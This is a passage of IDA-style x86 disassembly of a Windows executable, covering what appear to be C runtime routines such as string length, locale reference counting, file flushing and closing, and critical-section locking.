mov ebx, eax
mov [ebp+var_28], ebx
movzx eax, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp eax, ebx
jnz short loc_415F86
movzx eax, bl
mov ecx, off_42CE30
test byte ptr [ecx+eax*2+1], 80h
jz short loc_415F9D
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_415536
movzx ecx, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp ecx, eax
jz short loc_415F9A
cmp eax, 0FFFFFFFFh
jz short loc_415F86
push [ebp+arg_0]
push eax
call sub_41AC6F
pop ecx
pop ecx
loc_415F86: ; CODE XREF: sub_41554C+A02�j
; sub_41554C+A2D�j
cmp ebx, 0FFFFFFFFh
loc_415F89: ; CODE XREF: sub_41554C+471�j
jz short loc_415FB9
push [ebp+arg_0]
push [ebp+var_28]
call sub_41AC6F
pop ecx
pop ecx
jmp short loc_415FB9
; ---------------------------------------------------------------------------
loc_415F9A: ; CODE XREF: sub_41554C+A28�j
dec [ebp+var_30]
loc_415F9D: ; CODE XREF: sub_41554C+9E7�j
; sub_41554C+A12�j
cmp [ebp+var_28], 0FFFFFFFFh
jnz loc_41557A
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 25h
jnz short loc_415FB9
cmp byte ptr [eax+1], 6Eh
jz loc_41557A
loc_415FB9: ; CODE XREF: sub_41554C+35�j
; sub_41554C+3E7�j ...
cmp [ebp+var_24], 1
jnz short loc_415FC8
push [ebp+var_20]
call sub_412FE4
pop ecx
loc_415FC8: ; CODE XREF: sub_41554C+A71�j
mov eax, [ebp+var_34]
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_415FDD
test eax, eax
jnz short loc_415FDD
cmp [ebp+var_29], al
jnz short loc_415FDD
or eax, 0FFFFFFFFh
loc_415FDD: ; CODE XREF: sub_41554C+A83�j
; sub_41554C+A87�j ...
lea esp, [ebp-1E4h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_4182D6
call __SEH_epilog
retn
sub_41554C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416000 proc near ; CODE XREF: sub_412D93+17�p
; sub_414004+D2�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_416030
loc_41600C: ; CODE XREF: sub_416000+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_416063
test ecx, 3
jnz short loc_41600C
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_416030: ; CODE XREF: sub_416000+A�j
; sub_416000+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_416030
mov eax, [ecx-4]
test al, al
jz short loc_416081
test ah, ah
jz short loc_416077
test eax, 0FF0000h
jz short loc_41606D
test eax, 0FF000000h
jz short loc_416063
jmp short loc_416030
; ---------------------------------------------------------------------------
loc_416063: ; CODE XREF: sub_416000+13�j
; sub_416000+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41606D: ; CODE XREF: sub_416000+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_416077: ; CODE XREF: sub_416000+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_416081: ; CODE XREF: sub_416000+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_416000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41608B proc near ; CODE XREF: sub_412EBA+2A�p
; sub_41364A+37�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
cmp ecx, 100h
mov ecx, [ebp+arg_0]
ja short loc_4160A9
mov ecx, [ecx+48h]
movzx eax, word ptr [ecx+eax*2]
jmp short loc_4160FD
; ---------------------------------------------------------------------------
loc_4160A9: ; CODE XREF: sub_41608B+13�j
push esi
mov edx, eax
sar edx, 8
push edi
mov edi, [ecx+48h]
movzx esi, dl
test byte ptr [edi+esi*2+1], 80h
pop edi
pop esi
jz short loc_4160CE
and [ebp+var_2], 0
push 2
mov [ebp+var_3], al
mov [ebp+var_4], dl
pop eax
jmp short loc_4160D8
; ---------------------------------------------------------------------------
loc_4160CE: ; CODE XREF: sub_41608B+32�j
and [ebp+var_3], 0
mov [ebp+var_4], al
xor eax, eax
inc eax
loc_4160D8: ; CODE XREF: sub_41608B+41�j
push 1
push dword ptr [ecx+14h]
push dword ptr [ecx+4]
lea ecx, [ebp+arg_4+2]
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41AF01
add esp, 1Ch
test eax, eax
jnz short loc_4160F9
leave
retn
; ---------------------------------------------------------------------------
loc_4160F9: ; CODE XREF: sub_41608B+6A�j
movzx eax, word ptr [ebp+arg_4+2]
loc_4160FD: ; CODE XREF: sub_41608B+1C�j
and eax, [ebp+arg_8]
leave
retn
sub_41608B endp
; =============== S U B R O U T I N E =======================================
sub_416102 proc near ; CODE XREF: sub_4161CC+B7�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+3Ch]
push edi
xor edi, edi
cmp eax, dword_47A148
jz short loc_416178
cmp eax, edi
jz short loc_416178
mov eax, [esi+2Ch]
cmp [eax], edi
jnz short loc_416178
mov eax, [esi+34h]
cmp eax, edi
jz short loc_416143
cmp [eax], edi
jnz short loc_416143
cmp eax, dword_47A2C0
jz short loc_416143
push eax
call sub_412FE4
push dword ptr [esi+3Ch]
call sub_41B2AA
pop ecx
pop ecx
loc_416143: ; CODE XREF: sub_416102+23�j
; sub_416102+27�j ...
mov eax, [esi+30h]
cmp eax, edi
jz short loc_416166
cmp [eax], edi
jnz short loc_416166
cmp eax, dword_47A2C4
jz short loc_416166
push eax
call sub_412FE4
push dword ptr [esi+3Ch]
call sub_41B24B
pop ecx
pop ecx
loc_416166: ; CODE XREF: sub_416102+46�j
; sub_416102+4A�j ...
push dword ptr [esi+2Ch]
call sub_412FE4
push dword ptr [esi+3Ch]
call sub_412FE4
pop ecx
pop ecx
loc_416178: ; CODE XREF: sub_416102+11�j
; sub_416102+15�j ...
mov eax, [esi+40h]
cmp eax, dword_47A2BC
jz short loc_41619B
cmp eax, edi
jz short loc_41619B
cmp [eax], edi
jnz short loc_41619B
push eax
call sub_412FE4
push dword ptr [esi+44h]
call sub_412FE4
pop ecx
pop ecx
loc_41619B: ; CODE XREF: sub_416102+7F�j
; sub_416102+83�j ...
mov eax, [esi+50h]
cmp eax, dword_47A144
jz short loc_4161C2
cmp eax, edi
jz short loc_4161C2
cmp [eax+0B4h], edi
jnz short loc_4161C2
push eax
call sub_41B0BB
push dword ptr [esi+50h]
call sub_412FE4
pop ecx
pop ecx
loc_4161C2: ; CODE XREF: sub_416102+A2�j
; sub_416102+A6�j ...
push esi
call sub_412FE4
pop ecx
pop edi
pop esi
retn
sub_416102 endp
; =============== S U B R O U T I N E =======================================
sub_4161CC proc near ; CODE XREF: sub_41628E+18�p
push esi
call sub_415456
mov esi, eax
mov eax, [esi+64h]
cmp eax, off_42C7BC
jz loc_416289
test eax, eax
jz short loc_416216
mov ecx, [eax+2Ch]
dec dword ptr [eax]
test ecx, ecx
jz short loc_4161F2
dec dword ptr [ecx]
loc_4161F2: ; CODE XREF: sub_4161CC+22�j
mov ecx, [eax+34h]
test ecx, ecx
jz short loc_4161FB
dec dword ptr [ecx]
loc_4161FB: ; CODE XREF: sub_4161CC+2B�j
mov ecx, [eax+30h]
test ecx, ecx
jz short loc_416204
dec dword ptr [ecx]
loc_416204: ; CODE XREF: sub_4161CC+34�j
mov ecx, [eax+40h]
test ecx, ecx
jz short loc_41620D
dec dword ptr [ecx]
loc_41620D: ; CODE XREF: sub_4161CC+3D�j
mov ecx, [eax+4Ch]
dec dword ptr [ecx+0B4h]
loc_416216: ; CODE XREF: sub_4161CC+19�j
mov ecx, off_42C7BC
mov [esi+64h], ecx
mov ecx, off_42C7BC
inc dword ptr [ecx]
mov ecx, off_42C7BC
mov ecx, [ecx+2Ch]
test ecx, ecx
jz short loc_416236
inc dword ptr [ecx]
loc_416236: ; CODE XREF: sub_4161CC+66�j
mov ecx, off_42C7BC
mov ecx, [ecx+34h]
test ecx, ecx
jz short loc_416245
inc dword ptr [ecx]
loc_416245: ; CODE XREF: sub_4161CC+75�j
mov ecx, off_42C7BC
mov ecx, [ecx+30h]
test ecx, ecx
jz short loc_416254
inc dword ptr [ecx]
loc_416254: ; CODE XREF: sub_4161CC+84�j
mov ecx, off_42C7BC
mov ecx, [ecx+40h]
test ecx, ecx
jz short loc_416263
inc dword ptr [ecx]
loc_416263: ; CODE XREF: sub_4161CC+93�j
mov ecx, off_42C7BC
mov ecx, [ecx+4Ch]
inc dword ptr [ecx+0B4h]
test eax, eax
jz short loc_416289
cmp dword ptr [eax], 0
jnz short loc_416289
cmp eax, offset dword_42C768
jz short loc_416289
push eax
call sub_416102
pop ecx
loc_416289: ; CODE XREF: sub_4161CC+11�j
; sub_4161CC+A8�j ...
mov eax, [esi+64h]
pop esi
retn
sub_4161CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41628E proc near ; CODE XREF: sub_412EBA+12�p
; sub_41364A+17�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_427A08
call __SEH_prolog
push 0Ch
call sub_416901
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_4161CC
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4162C0
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41628E endp
; =============== S U B R O U T I N E =======================================
sub_4162C0 proc near ; CODE XREF: sub_41628E+24�p
; DATA XREF: .rdata:stru_427A08�o
push 0Ch
call sub_41686D
pop ecx
retn
sub_4162C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4162D0 proc near ; CODE XREF: sub_41554C+832�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_4162E9
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_4162E9: ; CODE XREF: sub_4162D0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_4162D0 endp
; =============== S U B R O U T I N E =======================================
sub_416304 proc near ; CODE XREF: sub_416387+4C�p
; sub_41BFAD+2DC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_41B76B
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_416352
cmp esi, 1
jz short loc_416320
cmp esi, 2
jnz short loc_416336
loc_416320: ; CODE XREF: sub_416304+15�j
push 2
call sub_41B76B
push 1
mov edi, eax
call sub_41B76B
cmp eax, edi
pop ecx
pop ecx
jz short loc_416352
loc_416336: ; CODE XREF: sub_416304+1A�j
push esi
call sub_41B76B
pop ecx
push eax
call ds:dword_41F034
test eax, eax
jnz short loc_416352
call ds:dword_41F008
mov edi, eax
jmp short loc_416354
; ---------------------------------------------------------------------------
loc_416352: ; CODE XREF: sub_416304+10�j
; sub_416304+30�j ...
xor edi, edi
loc_416354: ; CODE XREF: sub_416304+4C�j
push esi
call sub_41B6EC
mov eax, esi
sar eax, 5
mov eax, dword_47A2E0[eax*4]
and esi, 1Fh
pop ecx
lea ecx, [esi+esi*8]
and byte ptr [eax+ecx*4+4], 0
test edi, edi
jz short loc_416382
push edi
call sub_417C82
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_416384
; ---------------------------------------------------------------------------
loc_416382: ; CODE XREF: sub_416304+70�j
xor eax, eax
loc_416384: ; CODE XREF: sub_416304+7C�j
pop edi
pop esi
retn
sub_416304 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416387 proc near ; CODE XREF: sub_412F47+20�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00416406 SIZE 0000001C BYTES
push 0Ch
push offset stru_427A18
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47A2C8
jnb short loc_416406
mov eax, ebx
sar eax, 5
lea edi, ds:47A2E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_416406
push ebx
call sub_41B7AC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_4163DE
push ebx
call sub_416304
pop ecx
mov [ebp+var_1C], eax
jmp short loc_4163ED
; ---------------------------------------------------------------------------
loc_4163DE: ; CODE XREF: sub_416387+49�j
call sub_417C70
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_4163ED: ; CODE XREF: sub_416387+55�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4163FE
mov eax, [ebp+var_1C]
jmp short loc_41641C
sub_416387 endp
; =============== S U B R O U T I N E =======================================
sub_4163FB proc near ; DATA XREF: .rdata:stru_427A18�o
mov ebx, [ebp+8]
sub_4163FB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4163FE proc near ; CODE XREF: sub_416387+6A�p
push ebx
call sub_41B81F
pop ecx
retn
sub_4163FE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_416387
loc_416406: ; CODE XREF: sub_416387+15�j
; sub_416387+35�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41641C: ; CODE XREF: sub_416387+72�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_416387
; =============== S U B R O U T I N E =======================================
sub_416422 proc near ; CODE XREF: sub_412F47+18�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41644B
test al, 8
jz short loc_41644B
push dword ptr [esi+8]
call sub_412FE4
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_41644B: ; CODE XREF: sub_416422+A�j
; sub_416422+E�j
pop esi
retn
sub_416422 endp
; =============== S U B R O U T I N E =======================================
sub_41644D proc near ; CODE XREF: sub_412F47+10�p
; sub_414809+38�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_41649C
test ax, 108h
jz short loc_41649C
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41649B
push edi
push eax
push dword ptr [esi+10h]
call sub_41A961
add esp, 0Ch
cmp eax, edi
jnz short loc_416494
mov eax, [esi+0Ch]
test al, al
jns short loc_41649B
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_41649B
; ---------------------------------------------------------------------------
loc_416494: ; CODE XREF: sub_41644D+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41649B: ; CODE XREF: sub_41644D+25�j
; sub_41644D+3D�j ...
pop edi
loc_41649C: ; CODE XREF: sub_41644D+13�j
; sub_41644D+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_41644D endp
; =============== S U B R O U T I N E =======================================
sub_4164AA proc near ; CODE XREF: sub_4164D8+67�p
; sub_4164D8+82�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_41644D
test eax, eax
pop ecx
jz short loc_4164BF
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_4164BF: ; CODE XREF: sub_4164AA+E�j
test byte ptr [esi+0Dh], 40h
jz short loc_4164D4
push dword ptr [esi+10h]
call sub_41B98E
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4164D4: ; CODE XREF: sub_4164AA+19�j
xor eax, eax
pop esi
retn
sub_4164AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4164D8 proc near ; CODE XREF: sub_4165AD+2�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00416589 SIZE 0000001B BYTES
push 14h
push offset stru_427A28
call __SEH_prolog
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], edi
push 1
call sub_416901
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_4164F9: ; CODE XREF: sub_4164D8+99�j
mov [ebp+var_24], esi
cmp esi, dword_47B660
jge loc_416589
mov eax, dword_47A644
mov eax, [eax+esi*4]
cmp eax, edi
jz short loc_416570
test byte ptr [eax+0Ch], 83h
jz short loc_416570
push eax
push esi
call sub_4166A2
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, dword_47A644
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_416568
cmp [ebp+arg_0], edx
jnz short loc_41654F
push eax
call sub_4164AA
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_416568
inc [ebp+var_1C]
jmp short loc_416568
; ---------------------------------------------------------------------------
loc_41654F: ; CODE XREF: sub_4164D8+64�j
cmp [ebp+arg_0], edi
jnz short loc_416568
test cl, 2
jz short loc_416568
push eax
call sub_4164AA
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_416568
or [ebp+var_20], eax
loc_416568: ; CODE XREF: sub_4164D8+5F�j
; sub_4164D8+70�j ...
mov [ebp+ms_exc.disabled], edi
call sub_416578
loc_416570: ; CODE XREF: sub_4164D8+3A�j
; sub_4164D8+40�j
inc esi
jmp short loc_4164F9
sub_4164D8 endp
; =============== S U B R O U T I N E =======================================
sub_416573 proc near ; DATA XREF: .rdata:00427A3C�o
xor edi, edi
mov esi, [ebp-24h]
sub_416573 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416578 proc near ; CODE XREF: sub_4164D8+93�p
mov eax, dword_47A644
push dword ptr [eax+esi*4]
push esi
call sub_4166F4
pop ecx
pop ecx
retn
sub_416578 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4164D8
loc_416589: ; CODE XREF: sub_4164D8+2A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4165A4
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_41659E
mov eax, [ebp+var_20]
loc_41659E: ; CODE XREF: sub_4164D8+C1�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_4164D8
; =============== S U B R O U T I N E =======================================
sub_4165A4 proc near ; CODE XREF: sub_4164D8+B5�p
; DATA XREF: .rdata:stru_427A28�o
push 1
call sub_41686D
pop ecx
retn
sub_4165A4 endp
; =============== S U B R O U T I N E =======================================
sub_4165AD proc near ; CODE XREF: sub_41665F�p
push 1
call sub_4164D8
pop ecx
retn
sub_4165AD endp
; =============== S U B R O U T I N E =======================================
sub_4165B6 proc near ; DATA XREF: .data:0042A010�o
mov eax, dword_47B660
test eax, eax
push esi
push 14h
pop esi
jnz short loc_4165CA
mov eax, 200h
jmp short loc_4165D0
; ---------------------------------------------------------------------------
loc_4165CA: ; CODE XREF: sub_4165B6+B�j
cmp eax, esi
jge short loc_4165D5
mov eax, esi
loc_4165D0: ; CODE XREF: sub_4165B6+12�j
mov dword_47B660, eax
loc_4165D5: ; CODE XREF: sub_4165B6+16�j
push 4
push eax
call sub_41AB01
test eax, eax
pop ecx
pop ecx
mov dword_47A644, eax
jnz short loc_416606
push 4
push esi
mov dword_47B660, esi
call sub_41AB01
test eax, eax
pop ecx
pop ecx
mov dword_47A644, eax
jnz short loc_416606
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_416606: ; CODE XREF: sub_4165B6+30�j
; sub_4165B6+49�j
xor edx, edx
mov ecx, offset off_42C900
jmp short loc_416614
; ---------------------------------------------------------------------------
loc_41660F: ; CODE XREF: sub_4165B6+6D�j
mov eax, dword_47A644
loc_416614: ; CODE XREF: sub_4165B6+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_42CB80
jl short loc_41660F
xor ecx, ecx
mov edx, offset dword_42C910
loc_41662C: ; CODE XREF: sub_4165B6+A3�j
mov esi, ecx
mov eax, ecx
and eax, 1Fh
sar esi, 5
mov esi, dword_47A2E0[esi*4]
lea eax, [eax+eax*8]
mov eax, [esi+eax*4]
cmp eax, 0FFFFFFFFh
jz short loc_41664C
test eax, eax
jnz short loc_41664F
loc_41664C: ; CODE XREF: sub_4165B6+90�j
or dword ptr [edx], 0FFFFFFFFh
loc_41664F: ; CODE XREF: sub_4165B6+94�j
add edx, 20h
inc ecx
cmp edx, offset dword_42C970
jl short loc_41662C
xor eax, eax
pop esi
retn
sub_4165B6 endp
; =============== S U B R O U T I N E =======================================
sub_41665F proc near ; DATA XREF: .data:0042A02C�o
; FUNCTION CHUNK AT 0041BA4A SIZE 00000092 BYTES
call sub_4165AD
cmp byte_479E94, 0
jz short locret_416672
jmp loc_41BA4A
; ---------------------------------------------------------------------------
locret_416672: ; CODE XREF: sub_41665F+C�j
retn
sub_41665F endp
; =============== S U B R O U T I N E =======================================
sub_416673 proc near ; CODE XREF: sub_412F93+27�p
; sub_41313E+F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_42C900
cmp eax, ecx
jb short loc_416697
cmp eax, offset dword_42CB60
ja short loc_416697
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_416901
pop ecx
retn
; ---------------------------------------------------------------------------
loc_416697: ; CODE XREF: sub_416673+B�j
; sub_416673+12�j
add eax, 20h
push eax
call ds:dword_41F01C
retn
sub_416673 endp
; =============== S U B R O U T I N E =======================================
sub_4166A2 proc near ; CODE XREF: sub_4164D8+44�p
; sub_417CF5+66�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_4166B6
add eax, 10h
push eax
call sub_416901
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4166B6: ; CODE XREF: sub_4166A2+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41F01C
retn
sub_4166A2 endp
; =============== S U B R O U T I N E =======================================
sub_4166C5 proc near ; CODE XREF: sub_412FDC+1�p
; sub_413180+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_42C900
cmp eax, ecx
jb short loc_4166E9
cmp eax, offset dword_42CB60
ja short loc_4166E9
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_41686D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4166E9: ; CODE XREF: sub_4166C5+B�j
; sub_4166C5+12�j
add eax, 20h
push eax
call ds:dword_41F018
retn
sub_4166C5 endp
; =============== S U B R O U T I N E =======================================
sub_4166F4 proc near ; CODE XREF: sub_416578+9�p
; sub_417CF5+7D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_416708
add eax, 10h
push eax
call sub_41686D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_416708: ; CODE XREF: sub_4166F4+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41F018
retn
sub_4166F4 endp
; ---------------------------------------------------------------------------
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_416764 proc near ; CODE XREF: sub_41677E+20�p
cmp dword_479E5C, 2
jnz short loc_41677A
cmp dword_479E68, 5
jb short loc_41677A
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41677A: ; CODE XREF: sub_416764+7�j
; sub_416764+10�j
push 3
pop eax
retn
sub_416764 endp
; =============== S U B R O U T I N E =======================================
sub_41677E proc near ; CODE XREF: .text:004149F3�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call ds:dword_41F16C
test eax, eax
mov dword_47A63C, eax
jz short loc_4167C8
call sub_416764
cmp eax, 3
mov dword_47A640, eax
jnz short loc_4167CB
push 3F8h
call sub_416932
test eax, eax
pop ecx
jnz short loc_4167CB
push dword_47A63C
call ds:dword_41F168
loc_4167C8: ; CODE XREF: sub_41677E+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4167CB: ; CODE XREF: sub_41677E+2D�j
; sub_41677E+3C�j
xor eax, eax
inc eax
retn
sub_41677E endp
; =============== S U B R O U T I N E =======================================
sub_4167CF proc near ; CODE XREF: sub_4154C7�p
push esi
push edi
xor esi, esi
mov edi, offset dword_479EC0
loc_4167D8: ; CODE XREF: sub_4167CF+35�j
cmp dword_42CB8C[esi*8], 1
jnz short loc_416800
lea eax, ds:42CB88h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_41BBD8
test eax, eax
pop ecx
pop ecx
jz short loc_41680C
loc_416800: ; CODE XREF: sub_4167CF+11�j
inc esi
cmp esi, 24h
jl short loc_4167D8
xor eax, eax
inc eax
loc_416809: ; CODE XREF: sub_4167CF+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41680C: ; CODE XREF: sub_4167CF+2F�j
and off_42CB88[esi*8], 0
xor eax, eax
jmp short loc_416809
sub_4167CF endp
; =============== S U B R O U T I N E =======================================
sub_416818 proc near ; CODE XREF: sub_415438�p
push ebx
mov ebx, ds:dword_41F024
push esi
mov esi, offset off_42CB88
push edi
loc_416826: ; CODE XREF: sub_416818+30�j
mov edi, [esi]
test edi, edi
jz short loc_41683F
cmp dword ptr [esi+4], 1
jz short loc_41683F
push edi
call ebx
push edi
call sub_412FE4
and dword ptr [esi], 0
pop ecx
loc_41683F: ; CODE XREF: sub_416818+12�j
; sub_416818+18�j
add esi, 8
cmp esi, offset dword_42CCA8
jl short loc_416826
mov esi, offset off_42CB88
pop edi
loc_416850: ; CODE XREF: sub_416818+50�j
mov eax, [esi]
test eax, eax
jz short loc_41685F
cmp dword ptr [esi+4], 1
jnz short loc_41685F
push eax
call ebx
loc_41685F: ; CODE XREF: sub_416818+3C�j
; sub_416818+42�j
add esi, 8
cmp esi, offset dword_42CCA8
jl short loc_416850
pop esi
pop ebx
retn
sub_416818 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41686D proc near ; CODE XREF: sub_413037+2�p
; sub_4132F2+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push off_42CB88[eax*8]
call ds:dword_41F018
pop ebp
retn
sub_41686D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416882 proc near ; CODE XREF: sub_416901+14�p
; sub_417CF5+4F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
lea esi, ds:42CB88h[esi*8]
cmp dword ptr [esi], 0
jz short loc_41689A
xor eax, eax
inc eax
jmp short loc_4168FE
; ---------------------------------------------------------------------------
loc_41689A: ; CODE XREF: sub_416882+11�j
push edi
push 18h
call sub_41344D
mov edi, eax
test edi, edi
pop ecx
jnz short loc_4168B8
loc_4168A9: ; CODE XREF: sub_416882+63�j
call sub_417C70
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_4168FD
; ---------------------------------------------------------------------------
loc_4168B8: ; CODE XREF: sub_416882+25�j
push 0Ah
call sub_416901
cmp dword ptr [esi], 0
pop ecx
jnz short loc_4168EB
push 0FA0h
push edi
call sub_41BBD8
test eax, eax
pop ecx
pop ecx
jnz short loc_4168E7
push edi
call sub_412FE4
push 0Ah
call sub_41686D
pop ecx
pop ecx
jmp short loc_4168A9
; ---------------------------------------------------------------------------
loc_4168E7: ; CODE XREF: sub_416882+52�j
mov [esi], edi
jmp short loc_4168F2
; ---------------------------------------------------------------------------
loc_4168EB: ; CODE XREF: sub_416882+41�j
push edi
call sub_412FE4
pop ecx
loc_4168F2: ; CODE XREF: sub_416882+67�j
push 0Ah
call sub_41686D
xor eax, eax
pop ecx
inc eax
loc_4168FD: ; CODE XREF: sub_416882+34�j
pop edi
loc_4168FE: ; CODE XREF: sub_416882+16�j
pop esi
pop ebp
retn
sub_416882 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416901 proc near ; CODE XREF: sub_412FE4+1E�p
; sub_41318A+51�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
